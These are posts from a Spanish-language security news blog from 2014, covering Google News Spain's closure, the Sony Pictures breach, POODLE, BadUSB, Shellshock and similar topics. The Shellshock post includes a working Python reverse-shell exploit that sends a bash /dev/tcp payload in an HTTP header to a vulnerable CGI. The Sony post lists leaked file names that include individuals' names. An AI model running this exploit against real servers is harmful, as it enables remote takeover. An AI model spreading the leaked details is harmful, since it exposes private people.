16 dic 2014

CIERRA GOOGLE NEWS ESPAÑA, NO COMENTS!!

Como ya sabiamos todos, Google News España cierra sus puertas hoy a 16 de Diciembre de 2014. El siguiente texto es el que reza, donde antes podiamos disfrutar de sus noticias indexadas:

"Lamentamos tener que informarte que Google Noticias ha cerrado en España y que las publicaciones de los editores españoles ya no aparecen en Google Noticias, a raíz de los recientes cambios en la legislación española. Comprendemos que usuarios como tú podáis estar descontentos con esta nueva situación y por ello queremos explicarte las razones por las cuales hemos tomado esta decisión.

Google Noticias es un servicio gratuito, que utilizan y aprecian millones de usuarios de todo el mundo y que en la actualidad se encuentra disponible en más de 70 ediciones internacionales y en 35 idiomas. Incluye desde los periódicos nacionales, hasta las pequeñas publicaciones locales, medios especializados y blogs. Los editores pueden elegir si quieren que sus artículos aparezcan en Google Noticias o no y, por razones de peso, la inmensa mayoría opta por su inclusión. Google Noticias crea un verdadero valor para estas publicaciones al dirigir tráfico de usuarios a sus sitios web, lo que a su vez les ayuda a generar ingresos publicitarios.

Tras la aprobación de la reforma de la Ley de Propiedad Intelectual hemos tenido que cerrar el servicio de Google Noticias en España. Esta nueva legislación obliga a cualquier publicación española a cobrar, quiera o no, a servicios como Google Noticias por mostrar el más mínimo fragmento de sus publicaciones. Dado que Google Noticias es un servicio que no genera ingresos (no mostramos publicidad en el sitio web), este nuevo enfoque resulta sencillamente insostenible. 

Desde Google vamos a seguir manteniendo nuestro compromiso de ayudar y trabajar con el sector de la información, al igual que con nuestros miles de socios en todo el mundo, incluidos los de España, para ayudarles a incrementar sus lectores e ingresos en Internet." 

En muchos casos, decisiones así, conllevan grandes consecuencias y en su mayoría negativamente. Si no tiempo al tiempo.

Una gran cantidad de visitas a webs de periodicos de tirada nacional por parte de personas de entre 17-30 años, se realizaba a través de las noticias indexadas/relacionadas que Google ofrecia. Practicamente nadie, menos del 5% de las personas de ese rango de edad consultan directamente en las propias webs de los diarios. Por lo que el número de visitas que van ha recibir, se reducirá considerablemente, si no toman medidas.

26 nov 2014

POSIBLE INTRUSIÓN EN SONY PICTURES

Aunque todavía no lo han confirmado oficialmente la gente de SONY, todo apunta a que el grupo hacker conocido cómo GOP (Guardians of Peace), ha conseguido acceder a la intranet de Sony y obtener información sobre ellos, incluyendo documentos secretos, passwords, etc. cómo se puede observar en la imagen. Ésta imagen es la que aparece en todos los sistemas hackeados.


También los miembros de GOP habrían podido hacerse con cuentas de Twitter temporalmente, siendo éstas recuperadas al poco tiempo por Sony Pictures.

El ataque fué tan contundente que para evitar males mayores el personal de Sony Pictures tomó la decisión de desconectarse de Internet, desconectar todo tipo de conexión WIFI e incluso a algunos trabajadores les recomendarón irse a sus casas.

Según GOP han dejado un archivo de más de 200 Mb con el detalle de nombres de archivos que han borrado del sistema.

Éstos datos, detallados en dos listas, contienen más de 18 millones de entradas y 19 millones respectivamente, incluyendo documentos en .pdf, .doc, archivos de texto con contraseñas, bases de datos....

Ejemplos de nombres de archivos supuestamente sustraidos :

list1.txt:Netflix Is Killing BitTorrent in The US _ TorrentFreak.pdf
list1.txt:Torrent Spy Damages List.xls
list1.txt:Article- Hollywood Studios Fuming Over BitTorrent, Cinedigm 'Deal With the Devil'-TheWrap-4-24-13.doc
list1.txt:Article-File-Sharers Will Not Be Held Liable For Piracy, Russia Says-Torrentfreak-4-8-13.doc
list1.txt:Article- Operator of Germany's Torrent.to Gets Prison Sentence Amid Piracy Crackdown-THR-5-6-13.doc
list1.txt:Article-France Set To Dump 3 Strikes Anti-Piracy Law But Automated Fines Will Live On-TorrentFreak-5-14-13.doc
list1.txt:MASTER TORRENT STATS SHEET_021712.xlsx
list1.txt:Bill Backup 2014-11-01.xls
list1.txt:Closer - Icarus Prods tolling 2014-11-20.pdf
list1.txt:The Pirate Bay - The galaxy's most resilient bittorrent site.pdf
list1.txt:CPII & TSP Verifications - TorrentSpy.pdf
list1.txt:TorrentSpy Stats Study (Sony Titles).xls
list1.txt:TorrentSpy Decl. - SPE 11.29.pdf
list1.txt:MTORRENTEMIP-TV.DOC
list1.txt:BitTorrent-Garfield-2-09-05.DOC
list1.txt:Torrentspy Pleadings.doc
list1.txt:Torrentspy Discovery.doc
list1.txt:TorrentSpy_Parker_POC_TriStar_012809.pdf
list1.txt:Bittorrent Blocking Meeting.pptx
list1.txt:Bittorrent-Emule Report -2012-02-21 thru 2012-02-27.pdf
list1.txt:Bittorrent Report - 2012-04-15 thru 2012-05-15.xlsx
list1.txt:torrentz 3.13 vs.doc
list1.txt:torrentreactor 7 15 vs.doc
list1.txt:torrentreactor net 11 19 vs.doc
list1.txt:02.06 torrentmatrix.vs.doc
list1.txt:Youporn Materials Release.pdf
list1.txt:Anne Cox release form non disclosure agreement.pdf
list1.txt:Karen Payne release form? non disclosure agreement.pdf
list1.txt:Geoff Payne release form? non disclosure agreement.pdf
list1.txt:Anne Cox release form? non disclosure agreement.pdf
list1.txt:FY10 GISP Encryption Strategy Budget.xls
list1.txt:Inventory-encryption SPE full.xls
list1.txt:Inventory-encryption SPE Other.xls
list1.txt:Inventory-encryption SPE HR.xls
list1.txt:080128 Laptop Encryption CBA.xls
list1.txt:McAfee_Encrypted_USB_1_1_User_Guide.pdf
list1.txt:IDM Responsible Party DRM - Email Encrypt - 7-Zip Inquiry.docx
list1.txt:081120 Laptop Encryption - PGP Technical Installation Guide v3.doc
list1.txt:Encrypted Satellite Rider - Italy.docx
list2.txt:LBL_2014-11-27_LBL BLACK FRIDAY PROMO_v1.xlsb
list2.txt:vanessahudgens_nude_04.jpg
list2.txt:Felicia Goldstein Susan Rudow Nudelman Elaine Trapasso .jpg
list2.txt:Felicia Goldstein Susan Rudow Nudelman Sandra Brauer Udasco Elaine Trapasso.jpg
list2.txt:big_pic_nude copy.jpg
list2.txt:big_pic_nude copy.jpg
list2.txt:30 MINUTES OR LESS SPIKE FINAL-PORN.mov
list2.txt:30min-SP-2-Porn 7-27.mov
list2.txt:amilano@www.espn.go[1].txt
list2.txt:esitaras@www.eshop.msn[2].txt
list2.txt:esitaras@www.eshop[1].txt
list2.txt:esitaras@www.essential-oil[1].txt
list2.txt:reports_encrypted5254.zip
list2.txt:reports_encrypted3529.zip
list2.txt:SecurityBO.class
list2.txt:EncryptService.class
list2.txt:EncryptServiceImpl.class
list2.txt:StringToEncryptedStringMigrator.class
list2.txt:vmware3_keygen.zip
list2.txt:keygen.exe
list2.txt:Final_Draft_7.0.0.40_Keygen.zip
list2.txt:Writers.Cafe.v1.20.WinALL.Incl.Keygen-ViRiLiTY.zip
list2.txt:Corel Draw X5 with Keygen.lnk
list2.txt:Keygen.exe

Podemos encontrarnos desde documentación sobre cifrado, código fuente, archivos con contraseñas, hacking, e incluso algún video porno y algún keygen, para que luego digan...

Según mi opinión y varias fuentes de blogs/períodicos de renombre, de ser verdad ésta noticia, y la cantidad de información que se haría pública, podría suponer incluso al cierre de la compañía.


INFO:

Lista en Reddit, VER.
BBC, VER.



6 nov 2014

DETENIDO EL ADMIN DE SILK ROAD 2.0

Esto es lo que nos podemos encontrar si intentamos acceder a través de TOR a Silk Road 2.0.

Agentes federales de New York han detenido a un hombre como responsable del mantenimiento de éste servicio. Blake Benthall de 26 años, conocido como “Defcon,” ha sido, como digo, detenido en la ciudad de San Francisco.




Más INFO:

VER.

19 oct 2014

THE INTERNET DEFENSE LEAGUE, ¡¡TODOS UNIDOS!!

Desde 2012, THE INTERNET DEFENSE LEAGUE, y toda la gente que apoyamos este proyecto, estamos luchando por la neutralidad de la red, evitando o por lo menos intentando, que no se convierta en una red corrupta y controlada por unos pocos.


La idea principal de esta liga, tal y como figura en su web, es: 

"Cable companies are spending millions to gut net neutrality and slow your internet to a crawl. We can't let them. Run the Battle for the Net campaign and help us save net neutrality!". 

Que viene a decir algo asi como: 

"Las compañías de cable están gastando millones para destripar la neutralidad de la red y reducir la velocidad de internet a paso de tortuga. No podemos permitirselo. Comience la campaña "battle for the net"  y  ayudenos a salvar la neutralidad de la red!". 

Puedes unirte a la liga, añadir algunas de sus insignias en tu web y asi dar tu apoyo a la causa, siguiendo las instrucciones que nos indican en el sitio oficial. Es tan sencillo como copiar el codigo que más os guste y añadirlo a vuestro sitio web.

Puedes elegir entre:

Super insignia:


Insignia Escudo:



Insignia de pie de página:

Insignia lateral:
Insignia tipo "ribbon", cinta (izquierda y derecha):


¡Yo ya formo parte de la Liga! , ¿y tú?.

INFO Y JS CODES, IR.

16 oct 2014

POODLE, EL CANICHE QUE ACABA CON SSL V3.0 (IN-SECURE SOCKET LAYER)

Aunque su nombre no da miedo, Poodle (Caniche en inglés), ha generado una gran expectación al ser el nombre que tres desarrolladores de Google (de ahí su juego de letras) han puesto a la vulnerabilidad que tira por tierra el protocolo SSL en su versión 3.0.


Poodle (Padding Oracle On Downgraded Legacy Encryption) hace que el protocolo más usado hoy en día se quede obsoleto y vulnerable. Éste ataque permite a un hacker "calcular" el texto plano de tokens o cookies HTTPS, forzando un fallback a SSL 3.0, pudiendo así secuestrar sesiones o loguearse como otro usuario. El ataque es relativamente fácil de desarrollar y puede ser realizado "on-the-fly" usando JavaScript y así interceptar, por ejemplo, packetes de las víctimas en un punto Wifi público, como en una cafetería de moda.

SSL no tuvo un principio fácil, ya que incluso su primera versión ni vió la luz, directamente se publicó la 2.0 al mundo. Pasado un tiempo, en 1996, se publica la versión 3.0, que se pensaba que sería para siempre, pero como hemos visto hace poco, su final.... ha llegado.

Todos tenemos aún en mente las vulnerabilidades que han dado que hablar este tiempo atrás, me estoy refiriendo a Heartbleed y Shellshock, y aún sin tiempo de digerirlas del todo, nos encontramos con Poodle.

Según el "TOP 1 MILLION" de Alexa, a fecha 12 de Octubre de 2014, cerca del 96.9% de las páginas web usan HTTPS SSL v.3 y un 0.12 % de ellas no soporta ninguna versión de TLS. (sustitutivo/solución a éste problema).

Se aconseja desactivar SSLv.3, y usar TLS 1.0, TLS 1.1 o TLS 1.2. También hay que tener en cuenta y evitar que TLS se degrade a SSL, para ello tenemos una opción que evita que innecesariamente, a servidores y clientes que soporten TLS, pasen a usar SSL en su lugar. Ésta opción es TLS_FALLBACK_SCSV, (INFO,), si hablamos en términos de servidores. Para clientes (Firefox, Chrome, ...) cada uno está aplicando su solución.

De momento Firefox a desactivado por defecto SSLv.3 en su navegador versión "Nightly". Hasta el 25 de Octubre cuando publique su "release" 34, sobre el 25 de noviembre, no corregirá éste problema en su navegador habitual, (salvo que digan lo contrario).



INFO:

https://zmap.io/sslv3/


Análisis Técnico:

https://www.imperialviolet.org/2014/10/14/poodle.html


Paper completo:

Https://www.openssl.org/~bodo/ssl-poodle.pdf


Comprueba tus servidores con un diagnostico del SSL:

Https://www.digicert.com/help/

https://www.tinfoilsecurity.com/poodle

http://poodlebleed.com/



9 oct 2014

EL CÓDIGO DE BADUSB YA ESTÁ EN GITHUB

Aunque en un principio se dijo que no se haría público el código por su alta peligrosidad, no ha sido así, ya podemos disponer de él alojado en GitHub, AQUÍ.

El problema descubierto por los investigadores de BadUsb, y presentado por Karsten Nohl reside en la posibilidad de modificar el firmware de un dispositivo USB y añadirle funcionalidades adicionales.

Según los desarroladores se consigue alterar el firmware de los dispositivos aplicandole ingeniería inversa,  y heurística y así poder incorporar características adicionales, tales como cargar un exploit en el ordenador de la victima. Funcionaría en cualquier S.O., dependiendo de cual estemos usando, se necesitaría realizar una escalada de privilegios, como es en el caso de los sistemas operativos GNU/Linux.


Ésta vulnerabilidad además de afectar a pendrives, también lo haría con cualquier dispositivo que utilice USB, tanto cámaras web, discos duros externos, teclados..., aunqué no está comprobado en éstos todavía al 100%.

También se podría utilizar ésta vulnerabilidad para realizar ataques através de la red, usando un pendrive modificado y haciendose pasar éste por un adaptador de red Ethernet en el sistema objetivo y respondiendo a peticiones DHCP realizadas desde el sistema pero sin asignar una puerta de enlace. Esto se traduce en que si estamos conectados a una red Wi-Fi e introducimos un USB modificado en nuestro sistema, seguiremos navegando sin problema; pero las peticiones DNS que realicemos a la hora de acceder a una web, por ejemplo, serán gestionadas por el servidor cargado desde el pendrive, lo que permite ataques de redirección de tráfico que nos pueden llevar a sitios maliciosos que aparentan ser legítimos.

Tambíén se podría modificar para reconocer el tipo de BIOS y así ocultar el contenido malicioso, reescribir datos al vuelo e incorporar malware ... [todo lo que nuestra imaginación quiera, dentro de unos límites].

Pocas soluciones se dan a éste problema, una de ellas es que los fabricantes cambiaran y actualizaran sus firmwares y que el estándar cambiara, cosa poco probable ya que tardarían incluso hasta 10 años en hacerlo.

Aún sabiendo todo ésto, Adam Caudill y Brandon Wilson han tomado la decisión de hacer público el código y colgarlo en GitHub. ¡Gracias amigos! [Ironía].

¿Será éste el fin del USB tal y cómo lo conocemos?, ¿tendremos que cambiarnos a otros puertos de conexión como Thunderbolt o Lightning ?, Esperemos que nó.

Codigo en GitHub: VER.

Fuente:

Blog Bruce Schneier: VER.
Otros...

1 oct 2014

BLACKHAT, LA PELÍCULA

Chris Hemsworth, actor que interpreta a "Thor" en la película de Marvel y también en "Los vengadores", ha cambiado su martillo por un teclado en el primer trailer de "Blackhat",  de Michael Mann. Su estreno está previsto para el 16 de Enero de 2015.


Hemsworth interpreta a Nicholas Hathaway, un codificador genio, alumno del MIT y hacker, condenado a cumplir una condena de 15 años.

Los gobiernos estadounidense y chino se ven obligados a cooperar por el bien de la seguridad nacional de ambas potencias. Una fuerte amenaza informática está poniendo en riesgo las vidas y el futuro de la población. Delitos informáticos de alto nivel para los que deberán recurrir a sus mejores agentes de campo si quieren llegar a tiempo para evitar lo peor.

Web oficial: IR.
Ver Trailer en Youtube, VER.

30 sept 2014

SHELLSHOCK, TODO LO QUE NECESITAS SABER HASTA LA FECHA


Mucho se ha escrito y comentado al respecto sobre "Shellshock", por eso he decidido hacer un resumen con mucha de la información que se conoce al respecto hasta la fecha, sin entrar en demasiados detalles técnicos. La información procede de diversas fuentes y necesitaría mucho tiempo y dedicarle una entrada completa para citar todas, así que nombraré alguna de ellas al final del artículo.

Sobre el día 24 se dió a conocer una vulnerabilidad crítica en Bash, (acrónimo de Bourne-Again Shell) intérprete de comandos de Linux, BSD, y Mac OS X. Se registró como, CVE-2014-6271, pero más tarde se le ha reasignado a CVE-2014-7169, se ha asignado para cubrir la vulnerabilidad que todavía está presente después de la solución incorrecta.

Shellshock crea un punto débil que sirve como una puerta trasera para que un hacker ejecute comandos, hacerse cargo de una máquina, profundizar en los servidores, robar datos y desfigurar sitios web. La mayoría de los ordenadores y dispositivos domésticos habilitados para Internet, tales como routers, Wi-Fi, etc.

Webcams por ejemplo, son a menudo basados ​​en Linux y estos dispositivos también pueden ser hackeados y se utilizan como vectores de infección. Este problema se extiende a los dispositivos inteligentes conectados a el "Internet de las cosas", que se encuentra en cualquier lugar y en todas partes, incluyendo hospitales, centrales de energía, e incluso escuelas. Esto significa que incluso con una vulnerabilidad mínima en un dispositivo podría abrir las puertas a un posible ataque aún mayor.



GNU Bash a través de procesos 4.3 arrastran cadenas después de la definición de funciones en los valores de las variables de entorno, lo que permite a atacantes remotos ejecutar código arbitrario a través de un entorno hecho a mano, como se demuestra por los vectores que involucran la función ForceCommand en OpenSSH sshd, los módulos mod_cgi y mod_cgid en el Apache HTTP Server, scripts ejecutados por los clientes DHCP no especificados, y otras situaciones en las que establecer el medio se produce a través de una frontera privilegio de ejecución Bash, también conocido como "Shellshock"

Para comprobar la vulnerabilidad en sistemas *NIX, simplemente hay que proceder de la siguiente manera:

1. Ejecuta el comando siguiente, no hace falta ser "Root":

1| env testbug='() { :;}; echo VULNERABLE' bash -c "echo Hello"

2.  Si te devuelve:

1| VULNERABLE
2| Hello

El sistema es vulnerable. Por el contrario si ves:

1| bash: warning: testbug: ignoring function definition attempt
2| bash: error importing function definition for `testbug'
3| Hello

Su sistema NO es vulnerable.

Por otro lado, si tienes un sistema vulnerable con un script CGI, es trival para explotar y obtener una shell inversa con el código como este:

1|  #
2|  #CVE-2014-6271 cgi-bin reverse shell
3|  #
4|
5|  import httplib,urllib,sys
6|
7|  if (len(sys.argv)<4):
8|      print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
9|      print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
10|    exit(0)
11|
12| conn = httplib.HTTPConnection(sys.argv[1])
13| reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
14|
15| headers = {"Content-type": "application/x-www-form-urlencoded",
16| "test":reverse_shell }
17| conn.request("GET",sys.argv[2],headers=headers)
18| res = conn.getresponse()
19| print res.status, res.reason
20| data = res.read()
21| print data


Otras implicaciones conocidas hasta ahora, que seguro que aumentan estos días, son:
[cito textualmente de SBD]:
  • Uso en ForceCommand de SSH para limitar capacidades de ejecución de comandos
  • Otros CGI (como php, perl, etc) que lancen subshells con llamadas del tipo system()
  • Clientes DHCP que lancen shells.
  • Herramientas y aplicaciones con SUID que invoquen bash para alguna acción.
  • Sistemas móviles que utilicen bash, como Android
  • Otros sistemas con Linux, como routers (que generalmente lanzan pings, traceroutes, etc), modems, televisores, etc..

Otro de los troyanos bautizados como ELF_BASHLITE, ELF Linux/Bash0day o Shellshock o Bashroot ha sido analizado por TrendMicro. VER.


- ¿Cómo parchear Bash en OSX en la estela de "Shellshock"?. IR.
- ¿Cómo parchear tu OS X vulnerable al último problema de bash (para usuarios avanzados), IR.

Las soluciones por el momento están "en pañales", hay que estar pendiente de las principales páginas de nuestros sistemas y equipos, (sistemas operativos *NIX, rooters, etc...) y esperar a a que den solución al problema. Se recomienda actualizar todos los sistemas operativos y firmware, e instalar las actualizaciones de seguridad. Utilice las herramientas de detección de Shellshock o plug-ins para escanear posibles vulnerabilidades y exploits. Para los administradores de sistemas, parchear sus sistemas de inmediato y vigilar de cerca la actividad en la red.


Más Info:

Wikipedia:

-  Bash, IR.
-  Shellshock, IR.

Blogs/Webs:

-  Trend Micro, IR.
-  SecurityByDefault, IR.
-  National Vulnerability Database, CVE-2014-6271 y CVE-2014-7169.
-  Hispasec, IR.
-  Darknet, IR.
-  (...).





19 ago 2014

PASOS PARA MIGRAR DE 1024-BIT A LONGITUDES DE CLAVES MÁS FUERTES EN CERTIFICADOS SSL

Cómo nos comenta Symantec en su guía, tienen como objetivo ayudar a educar e informar a los usuarios de los certificados TLS / SSL sobre el próximo cambio en la longitud de las claves y nos aconseja sobre el manejo de su transición al uso de los certificados SSL más fuertes. 



Hasta hace poco, el algoritmo RSA, primero públicamente descrito en 1977 fue el único algoritmo disponible para la firma de certificados digitales comerciales. Sigue siendo el estándar de facto, aunque ahora los certificados comerciales basados en la criptografía de curva elíptica (ECC), están disponibles. Cuanto mayor es la clave en un certificado RSA más difícil es para comprometer la encriptación. Sin embargo, como aumenta el poder de computación en bruto, con el tiempo se hace posible crackear claves RSA de menor tamaño. Diecisiete cambios se han producido en los  tamaños de clave RSA desde 1991. Más recientemente, la industria se estandarizó en los certificados con claves RSA de 1024 bits. Sin embargo, expertos de la industria advierten que él tantas veces utilizado algoritmo de 1024 bits tamaño de la clave RSA es susceptible de verse comprometido por hackers.

Como medida preventiva, el NIST ha recomendado que los certificados RSA de 1024 bits se reemplacen  con claves de 2048 bits o más fuertes. Como resultado de la recomendación del NIST, la Autoridad de Certificación / Browser Forum (CA / B), creada para desarrollar mejor 
prácticas dentro de la industria de SSL / TLS, crearon un mandato para para poner fin a la vida el 31 de diciembre de 2013 a claves de 1024 bits. 

Los propietarios de certificados RSA de entidad final de 1024 bits se dividen en dos categorías: 

Los primeros tienen certificados que expiran antes del plazo de mandato. En este caso, los nuevos certificados expedidos este año deben estar basados en un algoritmo de tamaño de clave más fuerte, como de 2048 bits RSA, DSA de 2048 bits o 256 bits ECC. 

El segundo grupo tiene certificados con claves de 1024 bits que expiran después del 31 de diciembre 2013 fecha límite. Estos titulares de certificados deben revocar y reemplazar sus certificados con certificados basados en claves más fuertes. 

Duplicar el tamaño de la clave de un certificado afectará el rendimiento del sistema. No es una tecnología SSL alternativa disponible. Symantec ahora ofrece certificados SSL basado en el algoritmo de criptografía de curva elíptica (ECC). Estos certificados basados ECC utilizan una clave de 256 bits, por lo que requieren menos recursos de la CPU, menos ancho de banda y ofrecer tiempos de respuesta más rápidos. Symantec comenzó a trabajar en ECC en 2005 cuando comenzó a lanzar criptográficos de curva elíptica (ECC) raíces en los principales navegadores. 

Pasos que Symantec nos recomienda tomar:

  1. Comprueba  su sistema con un certificado de prueba válida con una clave de 2048 bits para asegurar que tu sistema puede manejar un tamaño de clave más grande (algunos entornos más antiguos no pueden). Puede descargar un certificado de prueba en go.symantec.com/ssl.
  2. Busque todos los certificados de 1024 bits dentro de su entorno. Si tiene un entorno complejo con muchos certificados SSL, es posible que desee considerar el uso de una solución de gestión. Con el “Symantec’s Certificate Intelligence Center” puede ayudar a descubrir y gestionar todos los certificados independientemente de quien haya emitido el certificado. Además también se puede automatizar la transferencia de certificados en certificados SSL de Symantec. Para los clientes que sólo manejan unos pocos dominios / servidores también pueden comprobar dominios individuales garantizados por Symantec, GeoTrust, Thawte o certificados RapidSSL con el “Symantec Certificate Checker”.
  3. Identificar el período de validez de su certificado para crear su plan de acción. Los certificados que se vencen en 2013 tendrán que ser actualizados durante el proceso de renovación normal. Usted tendrá que revocar y reemplazar los certificados que expiran después del final del año. Asegúrese de hacer esto antes de que su CA ponga fin a los certificados. 
  4. Generar una nueva solicitud de firma de certificado, (Certificate Signing Request (CSR)) para tamaño de clave de 2048 bits RSA. 
  5. Si usted tiene un certificado que expira en 2014 o más tarde tendrá que revocar y reemplazar ese certificado ante el CA / B. La fecha límite establecida fue el 31 de diciembre de 2013  pero también puede hacerlo cuando la entidad emisora tenga programado la revocación de certificados que expiran en 2014 o más tarde. 
  6. Una vez que su nuevo certificado ha sido emitido, instalar el certificado de entidad final y todos los certificados intermedios adicionales en su servidor. Usted puede obtener instrucciones adicionales y vídeos sobre la instalación en el sitio de información de Symantec de 1024 bits. 
  7. Por último, probar su sitio web o vincular para asegurarse de tener una conexión segura y cifrada. Hay una buena utilidad de prueba disponible aquí


(Lógicamente “barren para casa”, ;) , aconsejándonos a usar sus productos).

SYMANTEC PDF IR



15 ago 2014

EDWARD SNOWDEN Y STRANGELOVIAN, NOMBRE EN CLAVE, MONSTERMIND

Edward Snowden, con sólo 31 años de edad, ha cumplido el sueño de muchos expertos en informática, salir en la portada de la revista WIRED, dónde se le observa abrazando la bandera americana desde su exilio en Rusia. Pese a todo afirma que "ama" a su pais.


Snowden comenta en la extensa entrevista concedida a la citada revista, que mientras recopilaba información sobre las técnicas de espionaje masivo por parte de la NSA, dejó pistas a cada paso que daba, dice que dejó "migas de pan" para así cubrirse las espaldas y según él, obligar al gobierno de los EEUU a cambiar su política exterior. Lo más llamativo es que de ser cierto esto, les está resultando complicado a la agencia norteamericana el localizarlas.

Centro de Datos de la NSA en Utah. Vista de la guarida física de Monstermind, fotografiado desde un dirigible Electronic Frontier Foundation Parker Higgins, Electronic Frontier Foundation.


Una de las revelaciones que más ha llamado la atención ha sido el sistema automático de "strike-back", llamado MONSTERMIND. Éste programa automatizaría el proceso de caza de los comienzos de un ciberataque extranjero, estando constantemente buscando patrones de tráfico conocidos o sospechosos. 

Cuando Monstermind detecta un ataque por parte de un país extranjero, bloquea la entrada, lo que se conoce como "kill". Cómo Monstermind siempre han existido programas durante décadas, pero la novedad de éste es la capacidad de actuar automáticamente.

Entrevista en WIRED, VER.


14 ago 2014

USB TYPE-C, EL NUEVO ESTANDAR USB 3.1

Type-C, ese es el nombre con que "USB Promoter Group" ha bautizado el nuevo conector USB, el cual será parte del estándar USB 3.1, orientado a dispositivos más pequeños y delgados. Aún siendo más compacto, la tasa de transferencia anunciada es de 10 Gbps. Medirá 8.4 mm de ancho por 2.6 mm de alto, con hasta 100 watts de potencia y una durabilidad de 10.000 ciclos. Además será reversible, es decir, podremos conectarlo de un lado u otro, sin tener que rotarlo. Cuantas veces nos ha pasado que no conectamos el USB convencional a la primera, verdad ;) .


El nuevo USB Type-C será "tan robusto como para ser utilizado en notebooksy tables", y "lo suficientemente pequeño para teléfono moviles". 



WEB USB: IR.

13 ago 2014

DISPONIBLE EL MATERIAL DE LA BLACKHAT USA 2014


Como todo el mundo sabe, ya esta en marcha la edición 2014 de la BlackHat USA, una de las concentraciones de seguridad más importantes a nivel mundial. Para el disfrute de todos nosotros ya está disponible el material de esta conferencia. Entre un montón de ponencias, charlas e incluso polémicas podemos disfrutar de un amplio abanico de actividades, (para el que pueda pagarlo y el que tenga tiempo para viajar hasta alli ;) ). 


BlackHat USA 2014, IR.

24 jul 2014

INDEXEUS, BUSCA INFORMACIÓN PERSONAL ENTRE BASES DE DATOS HACKEADAS

Indexeus es un nuevo motro de búsqueda que indexa información de cuentas de usuario procedentes de brechas de seguridad hackeadas.


Indexeus ha sido desarrollado por el portugués, Jason Relinquo, un hacker de 23 años de edad, que ha construido un archivo de búsqueda que contienen "más de 200 millones de registros". Jason ha recogido una gran cantidad de datos relacionados con las cuentas utilizadas por los hackers, incluidas las direcciones IP, direcciones de correo electrónico, nombres de usuario, contraseñas, direcciones físicas, cumpleaños y otros muchos datos personales. 

23 jul 2014

CANCELADA CHARLA EN LA BLACK HAT 2014 SOBRE EL ANONIMATO DE TOR


Se ha cancelado una de las charlas más interesantes de la próxima Black Hat 2014, titulada "YOU DON'T HAVE TO BE THE NSA TO BREAK TOR: DEANONYMIZING USERS ON A BUDGET", algo así como, "TU NO TIENES QUE SER DE LA NSA PARA ROMPER TOR: DESANONIMIZANDO USUARIOS SIN SALIRSE DEL PRESUPUESTO". Alexander Volynkin y Michael McCord, investigadores de la universidad de Carnegie Mellon, iban a presentar cómo se podía identificara a los usuarios de TOR con tan sólo unos dolares de presupuesto (unos $3000).




La charla ha sido retirada por el "Software Engineering Institute" (SEI) de la propia Universidad Carnegie Mellon en Pittsburgh, según comentan "los materiales de los que se iban a hablar en la charla no habían sido aún aprobados por la CMU/SEI para hacerse públicos".


El instituto, con sede en la universidad, es financiado por el Departamento de Defensa. SEI también dirige CERT, históricamente conocido como el "Computer Emergency Response Team", que trabaja con el Departamento de Seguridad Nacional en las principales cuestiones de seguridad cibernética.

16 jul 2014

"PROJECT ZERO", EL EQUIPO DE HACKERS DE ÉLITE DE GOOGLE


Cómo se puede leer en wired.com, hoy Google planea revelar públicamente el equipo, conocido como “Proyecto Zero”, un grupo compuesto por  los principales investigadores de seguridad de Google con la única misión de localizar y neutralizar los fallos de seguridad más maliciosos de software del mundo. Esos fallos secretos hackables, conocidos en la industria de la seguridad como “0-Days” o vulnerabilidades de "día cero", son explotadas por criminales, las agencias de inteligencia en sus operaciones de espionaje etc. Los hackers del “Proyecto Zero” no buscarán errores sólo en los productos de Google, sino que también van a dar rienda suelta para atacar cualquier software cuyos “zero-days” pueden ser desenterrados y así demostrar a otras compañías, con el objetivo de presionar para proteger mejor a los usuarios de Google. 


Según comenta para Wired, Chris Evans:

 “People deserve to use the internet without fear that vulnerabilities out there can ruin their privacy with a single website visit,” 

Que viene a decir:

"La gente merece el uso de Internet sin temor a que las vulnerabilidades que hay por ahí puedan arruinar su vida privada con una única visita a un sitio web" .

24 jun 2014

¿MENSAJE OCULTO CON ESTEGANOGRAFÍA EN TRUECRYPT?


No sabemos si es la histéria colectiva o la paranoia del mundo en general, o es que realmente nos están queriendo decir algo con un mesaje encubierto. En épocas de conflictos no es nada raro que existan mensajes ocultos en textos, usando por ejemplo técnicas como la esteganografía.


Lo que si es verdad, y por lo menos es bastante curioso, es que en el mensaje que vemos en la web de TrueCrypt, donde pone "WARNING:" inmediatamente después podemos leer "Using TrueCrypt is not secure as it may contain unfixed security issues". Lo curioso viene a continuación, si cogemos la primera letra de cada palabra obtenemos: "utinsaimcusi", que a simple vista no nos dice nada, pero que si nos ayudamos del traductor de google, por ejemplo y lo traducimos del Latín al Inglés, es obtiene lo siguiente: "uti nsa im cu si" que en Inglés es, "If I wish to use the NSA", que se podría interpretar cómo, "NO lo uses a no ser que quieras usar un software de la NSA".


Lo que todavía sigue asombrando es que si por ejemplo hacemos la traducción del Latín a otros idiomas como el Croata o el Serbio, el resultado es distinto pero con un mensaje parecido. En éste caso el resultado de la traducción es, "I hear they're NSA". 


Todo ésto da que pensar, porque desde un principio siempre se ha tenido la sospecha de que estaba la agencia americana detrás de éste proyecto. Las aguas se calmaron un poco tras la primera revisión del código, VER, pero parece ser que vuelven a crear confusión, sobretodo después del repentino cierre del proyecto por parte de sus desarrolladores, voluntariamente o no. Como se suele decir, "el tiempo dirá".

17 jun 2014

SHODAN, DISPOSITIVOS ONLINE EXPUESTOS


Todos conocemos la potencia y algunas de las utilidades del buscador SHODAN. Según Wikipedia, "Shodan es un motor de búsqueda que te permite encontrar tipos específicos de equipos (routers, servidores, etc) en el Internet a través de una variedad de filtros. Algunos también lo han descrito como un motor de búsqueda de banners de servicios, que son los meta-datos que el servidor envía de vuelta al cliente. [1] Esto puede ser información sobre el software del servidor, lo que las opciones de los soportes de servicio, un mensaje de bienvenida o cualquier otra cosa que el cliente puede encontrar a cabo antes de interactuar con el servidor.

Shodan recoge datos sobre todo en los servidores web en el momento (HTTP puerto 80), pero también hay algunos datos de FTP (21), SSH (22) Telnet (23), SNMP (161) y (5060) Servicios de SIP.

Fue lanzado en 2009 por el informático John Matherly, quien, en 2003, concibió la idea de dispositivos conectados a Internet a buscar.  El nombre de Shodan es una referencia a SHODAN, un personaje de la serie videojuego System Shock.".



Lo importante es que con la ayuda de éste buscador se pueden encontrar cosas bastante curiosas, además de información sensible, también incluso datos sobre aerogeneradores, turbinas, centrales de energía, etc. 

